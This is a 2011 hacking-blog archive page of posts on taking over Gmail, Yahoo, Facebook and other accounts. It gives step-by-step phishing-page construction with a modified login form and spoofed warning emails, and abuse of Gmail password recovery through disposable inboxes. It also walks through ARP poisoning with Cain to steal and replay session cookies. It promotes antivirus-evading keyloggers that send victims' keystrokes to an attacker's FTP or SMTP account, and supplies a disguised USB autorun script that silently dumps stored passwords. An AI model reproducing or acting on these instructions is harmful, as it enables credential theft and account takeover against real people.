Showing posts with label Gmail Hacks. Show all posts
Showing posts with label Gmail Hacks. Show all posts

Saturday, 7 May 2011

How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)

In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack. But in this new version this problem is eliminated and this is has become more fullproof than the previous version.
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.
Now follow the following steps :
  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=”New_Form” action=”http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”>
Now Save the yahoofake.html.
To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.
First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”.
Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.
Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked.
If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck !

Wednesday, 20 April 2011

10 steps & You Hack Random Gmail Acounts

             10 steps & You Hack Random Gmail Acounts


Getting Straight to the tut

step 1: first signout of your gmail account .

step 2: go to "I Cannot Access My Account " tab which is below the password field

step 3: go to Yopmail.com and enter any random name eg:ron
and then click check inbox
and leave it open.

step 4: On "I Cannot Access My Account " page in Gmail just click forgot my username and go to username recovery page.

Step 5: Enter The Yopmail email you just opened eg :ron@yopmail.com

Step 6: now click check for new emails tab in yopmail you will get all the gmail id's associated with it eg you'll get some gmail id's like xx@gmail.com copy that id

step 7: just go again to the "I Cannot Access My Account " in gmail and this time choose forgot my password and go to password recovery page

step 8:Now Enter The Gmail Id You Copied xx@gmail.com in username
fill the captcha and everything

step9: If The Gmail Password recovery ever asks a security question then no need to panic !
look below the security question there will be a tab link send the reset password link to my recovery email

step 10:just go to the yopmail inbox again and click on the link gmail posted and reset their gmail password

VOILA !! You Just hacked A Gmail Account
P.S :There Are Fb, Twitter,Various Forums Logins Too Attached With The Emails So Just Enjoy Using Their Account!!
You Can Use : http://www.mailinator.com,mailcatch.com,...pemail.net
instead of 
http://www.yopmail.net

Hack Gmail Accounts

Hello Friends, Let's start this tutorial with some quotes " If you follow the Universe, the Universe will spoil you,So always make your own ways, let's other follow it and spoil themselves."

Today i will explain you How to hack Gmail account step by step. In my previous article i have explained you the basic technique involved in hacking Gmail account or password but not explained that in extended way but today i will disclose you how the hackers really hack the gmail account or gmail password using fake pages or simply called Phish pages and the technique involved is called Phising.

NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY. DON'T MISUSE IT.



Things that we will need:
1. Phish pages for Gmail Website.
2. A Free web hosting server to upload these fake pages.

3. An Email account for sending mails. ( create one fake email account for this as your account can be banned for doing such things).

4. HTML format mail that has to be sent to user ( you can post your email ID's below if you need the original version of this HTML mail. And please don't put your credentials in reply of this message).

Note: By using this hack i have hacked more than 5000+ accounts of gmail, yahoo, facebook, hotmail etc...As Hacking is my passion and i love to do it for fun. But friends i never misused this and hope that you will also not do that. As this tutorial is for Educational purposes and i and isoftdl.com is not responsible if you have misused it.



Now friends first all you should know what is phishing and how it is done..


What is Phishing?
Phishing is a technique to hack passwords of any user by using phish pages. Now what are phish pages, in general, phish pages are the fake pages that look likes the same web page the only difference lies in the METHOD and ACTION codes. In original webpage you are directed to database to that website but in fake pages you are directed to program that writes the log file that consist of username and password of the user. In fake page method function directs you to a php program that writes the log and simultaneously it redirects to original website and copy the username in the username column of original website and it shows that you have entered a wrong password and when you enter the password again then you are entered into the original website. So the user will never know that his account has been hacked, he will only think that he has entered wrong password. So isn't its a good trick.




STEP BY STEP GUIDE TO HACK GMAIL ACCOUNT

1. Download the phish pages ( fake pages for Gmail).
Click here to download

2. Now Extract the folder . After extracting you will get two folders namely:

  a. Gmail.com ( For all countries)   b. Gmail.de    (For Germany users)


3. Now open the Gmail.com folder. In this folder you will see three files namely:

  a. gmail.html   b. mail.php   c. log.txt
Gmail.html is the phish page that looks like original Gmail page, when user enters his credentials i.e. username and password, then it will be redirected to write.php file which will write username and password to log file and simultaneously redirect the user to original website, that will show you have entered wrong password.



4. Now Create a fake Gmail account for sending mails and creating account on free web hosting server.

How to create Gmail account without Phone verification?

Its pity simple to create Gmail account without Phone verification. At the time when you create new account, when you choose email ID (i.e. username ), choose it as much as unique or absurd that you can. Now create the account , gmail will not ask you for phone verification.



5. Now when you have created the fake account for testing this hack, you have to configure this email account setting. Login to fake Gmail account and click on settings. Then go to Accounts and Import and then in front of Send Email as  you will see edit info as shown in below snapshot.



hack gmail

 6. Now You have to create account on free Web Hosting website. The website that i will use to explain is         www.t35.com. When you open the website there you will see a button "START UR WEBSITE" click on that. Now you will see new page there enter the credentials and create account. Then go to your fake email address and validate the account.


7. Now login into your account in t35.com and Now click on New Directory as shown below:



hack gmail id


Then do as shown in this snapshot:



hack gmail account password


After confirming go back to main directory as shown:



How to hack gmail account




Now double click on Gmail folder on t35.com that we have created in previous step. Now you will be inside the Gmail Directory. Then click on Upload button as shown is figure:



hack gmail password


Now after confirming the files upload go back to main Gmail directory. Now there you will see three files and click on the open  in front of gmail.html file as shown below:



working gmail id hack


Now you will see the something awesome below:



how gmail hack works


8. Now we have created the fake page but its detectable. Let's make it more undetectable. For that go to the following website and copy the link in the URL box and Click on Next. As shown below:



gmail hacking software


Now after that enter domain name her like gmailvalidation.tk or gmail verify.tk or anything similar to that as shown...





Now click Below to confirm as shown:

how gmail hack works

Now open the sample website you will see :(Click here)

9. Now Creation Part is over, now we have our link that we will send to the user. Now How we will send it to user. Open your fake email account that you have created in step 5 and step 6. Click on Compose mail and In Subject Enter "Notice: Please Verify your Gmail Account" ( without quotes).
And in body write something like that we have seen illegal activity from your account. please verify your account within three days other we have to lock your email account. For verifying visit here www.gmail.com and hyperlink link your fake mail address and send it to user.
 If you want to get the Original Mail, post your Email ID below in comment. I will mail you the original mail directly to your email. We can't disclose it directly on website.

10. Now just wait one day or few hours till user enters his credentials.(depends how fast the user reacts to the email). Once the user logs in to his Gmail account using your Phisher, his user ID and password are ours..And these are stored in log.txt What you have to do is just refresh your Web hosting account files. 

how to hack gmail accounts

11. The Log.txt file will contain the passwords and look like this:

gmail passowrd hacking
 

Thats all Now you have hacked the password of victim. I hope you all have Liked It.

There are other tricks to hack email accounts for this Click Here.


How to Protect Your Gmail Account From Phisher??
1. Always check the URL in the address bar before entering username and password.
2. Never follow any link from your email and any website until u have confirmed the Address bar URL.
3. Never Follow spam mails and "Win lottery or Cash" mails.

If you have Any Queries Ask me in form Of Comments ...  Enjoy and have Happy hacking.

Hacking Gmail Accounts

Introduction

Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:
You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
You know basic networking.

Tool used for this attack:
Cain & Abel
Network Miner
Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,
If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).
Start Cain from Start > Program > Cain > Cain
Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the slave.
Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select
All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.
How to check your physical IP ?
> Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

Click on Configure > APR > Use Spoof ed IP and MAC Address > IP
Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the slave IP address and the default gateway.

The purpose is to do ARP poisoning between slave and the default gateway and route the slave traffic via your machine. From the left side click on slave IP address, we assume slave is using 192.168.1.15. The moment you click on slave IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.
Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning slave and default gateway.

Using Network Miner to capture cookie in plain text:

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.
Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.
Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon
Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to slave email id, for this we will use firefox and cookie editor add-ons.

Using Firefox & cookie Editor to replay attack.

Open Firefox and log in your gmail email account.
from firefox click on Tools > cookie Editor.
In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
From the Address bar of Firefox type mail.google.com and press enter, this should replay slave GX cookie to Gmail server and you would get logged in to slave Gmail email account.
Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https

Download The Google Best Practices Guide eB | 9.5 MB




Download The Google Best Practices Guide eB | 9.5 MB


Doing business online for most of us depends on good search engine rankings. Today, that means ranking well in Google. With an organic search market share of over 57.1% and PPC click-through rates of 64.7% (some analysts put Google s search rates even higher) Your online marketing program may be dead in the water without good Google rankings. But with Google constantly changing their algorithms and filters how can you ensure your website stays at the top? The only guide you will need to improve your Google rankings, the Google Best Practices guide contains information not found anywhere else.

SEO techniques that have been proven through countless hours of testing on real domains. Here is the truth - this is not like your typical guide on search engine marketing. This guide contains real Search optimization information. We have thoroughly tested these optimization techniques and used them to build dominant sites. Let s face it, there are many Search Engine Gurus out there who claim to be best buddies with Matt Cutts of Google and that he gives them the secret inside information no one else knows. I have one question when I hear this: How long do you think Google would keep Matt around if he was leaking secret information about the Google search filters and algorithms? I think Matt s response to these claims would be, Who said that? Never met them. Let s get down to it. This guide is 178 pages of packed up-to-date content. That s over 43,000 words. And I don t hold anything back from my testing lab of more than 500 domains.

Here s a peak at what s included:

* SEO Is Dead - Gurus who don t understand SEO tell you SEO is dead. Their main objective is to sell you an inflated package of information you probably already know.
* SEO in a Box - SEO isn t difficult, it is understanding key factors and then doing them well. I outline a process which will give you better rankings for the terms which will earn you more revenue.
* The Title Tag. - Learn about this misunderstood weapon.
* Linking Strategies - Getting links isn t rocket science and it isn t about hiring someone overseas to submit your site to thousands of worthless directories. I will show you how to do it properly.
* Maximum Google Love - I ll show you how to setup your site to get the maximum Google Love. Even if you have no technical knowledge, I break things down so it is simple to understand and execute.
* Page Rank - The real Importance of Page Rank and how it can affect your rankings.
* Step-by-Step Web Development - Learn the proper step-by-step of web development to ensure your site meets the criteria of Google. Included is choosing a domain name, web hosting, site design, site structure, page size, content creation, keyword research, etc. If you are ready to dominate the competition, then get the guide now.

Download Links Hotfile


Fileserve

How To Hack Facebook/Myspace/Orkut Or Any Email

How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging
Fud Long Time


Rapzo Logger v 1.5 ( Public Edition )By Rapid

[Image: 92564171.jpg]



" Virus Results By Scan4you.net 0/32 "(Paid Host )


[Image: 78831054.jpg]

Options


[Image: op2wo.jpg]

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers


Steler Logs :

[Image: fine2.jpg]

[Image: fineh.jpg]

Who Wanna Change Assembly See This

[Image: asm.gif]

Download LinkS


http://www.mediafire.com/?belchwxdl6z2xl9

http://akenload.com/download/141/RapZo_L..._.rar.html

http://www.megaupload.com/?d=IFRRHPBX

http://rapidshare.com/files/418946168/Ra...tion__.rar


Recover Stored Google Account Passwords Google Password Decryptor




Google Password Decryptor in Action
is the free tool to recover stored Google account passwords by various applications. Most of the Google's desktop applications such as GTalk, Picassa etc store the account passwords in their private encrypted store to prevent hassale of entering the password everytime. GooglePasswordDecryptor helps in recovering such stored passwords from most of these application's private stores.

It can even show passwords from multiple accounts if you have used more than one Google account.It also comes with 'Export Feature' to save the recovered Google passwords to HTML or TEXT format for future use.

Features of GooglePasswordDecryptor
GooglePasswordDecryptor supports recovering of the stored encrypted password from most of the prominent Google desktop applications as well as internet browsers. Here is the complete list of supported applications.

* Google Talk
* Google Picassa
* Google Desktop Seach
* Gmail Notifier
* Internet Explorer (all versions from 4 to 8)
* Google Chrome

It also provides 'Export Feature' to save the recovered Google passwords to HTML or TEXT format for future use.

Download link:

Hack Facebook/Twitter Or Any Email Account With Session Hijacking

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.


As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:



Double-click on someone, and you're instantly logged in as them.



That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.
By Codebutler..

How to use Gmail as a Online Storage

.
Need to store things online for either hacking purposes or personal purposes?
Then do it on Googles Gmail for free.

Lets begin
(Only windows XP,Vista,7)
You may want to create another Gmail account and not use your own personal one due to the
fact when you upload the files it will come up as your emails.
Trust me it looks annoying.Just use the new one for online storage only.


Download Gmail Drive from filehippo here:

http://www.filehippo.com/download_gmail_drive/
Download the latest

The file you downloaded will be in a zip file.
Extract the files into a New folder like this




[Image: newfolder.jpg]

Double click "setup" and the will program install automatically on your computer.
Might tell you to restart your computer
Go to "My Computer" or "Computer"
You will see the GMail Drive installed like this


[Image: gmaildrive.jpg]

Double click GMail Drive and it will prompt you to sign into your gmail account.


[Image: gmaildrive2.jpg]
There you go now your done.All you do is drag the files you want to put into storage into the GMail Drive.
You will then get a email on Gmail about the file being uploaded.

Heres a video about this

http://www.youtube.com/watch?v=55dBtmHay-0
Watch it in HD

Hack Yahoo,Hotmail,Myspace,MSN account passwords



Hello Friends here is One More tutorial about hacking Facebook , Hotmail ,Yahoo ,Gmail ,Twitter ,orkut ,myspace and msn accounts with easy as 1 2 3 . In my previous article, I mentioned about  Armadax Key logger for Hacking Hotmail, Yahoo, Myspace and Msn account passwords.
Today i am Introducing a very effective key logger namely Vicspy key logger - the key logger that I found extremely Good and user-friendly for hacking hotmail, yahoo account passwords. I have provided link for software download and password ... So Enjoy and Let's Begin the Tutorial .

Hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn Passwords


1. Download Vicspy keylogger for hacking Hotmail, Yahoo, msn ,myspace ,Face book And Gmail account passwords.

2. Extract the Rar to obtain Vicspy keylogger.

3. Simply run peditor.exe to get key logger interface and create a key logger for hacking hotmail, yahoo and msn account password. No need to install software on computer.


4. Now, in Servers , fill in the FTP server which you wanna use to receive logs from keylogger.

Fill in ftp server as:

where:
# user: your username at ftp server.
# pass: your password.
# logs: create a new folder named "logs" at your ftp server. You will receive hotmail, yahoo and msn hacked passwords in this folder.
# ftp.example.com : your ftp server address. (eg: ftp.drivehq.com for drivehq ftp server)

After you have completed filling ftp server, hit on "Check" just adjacent to it to check whether you have entered ftp server correctly and whether server is available.

5.
In Control, check "Melt" to make key logger evaporate after installation on victim computer.

6. Additional Options included in Vicspy key logger are that you can
- Change keylogger file icon
- Bind key logger with another file to make it undetectable by victim.

7. Now, simply choose the path where you want key logger to be saved and hit on "Create" to create key logger file at preferred destination.

8. Now, send this file to your victim and make him to install this binded keylogged file on his computer (Social engineering). You can crypt this keylogger file and then use Fake error message generator to make our key logger undetectable by antivirus.

Once the victim installs key logger on his computer, you will start receiving all typed passwords on his computer in your FTP server account (in logs folder). Thus, our target of hacking hotmail, yahoo, msn account password accomplished.

That's ALL About Vicspy Key logger for hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn account passwords. Vicspy keylogger can also be used for hacking other email account passwords.

How to Sniff/Hack Passwords Using USB Drive?

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.


MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad as all files and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.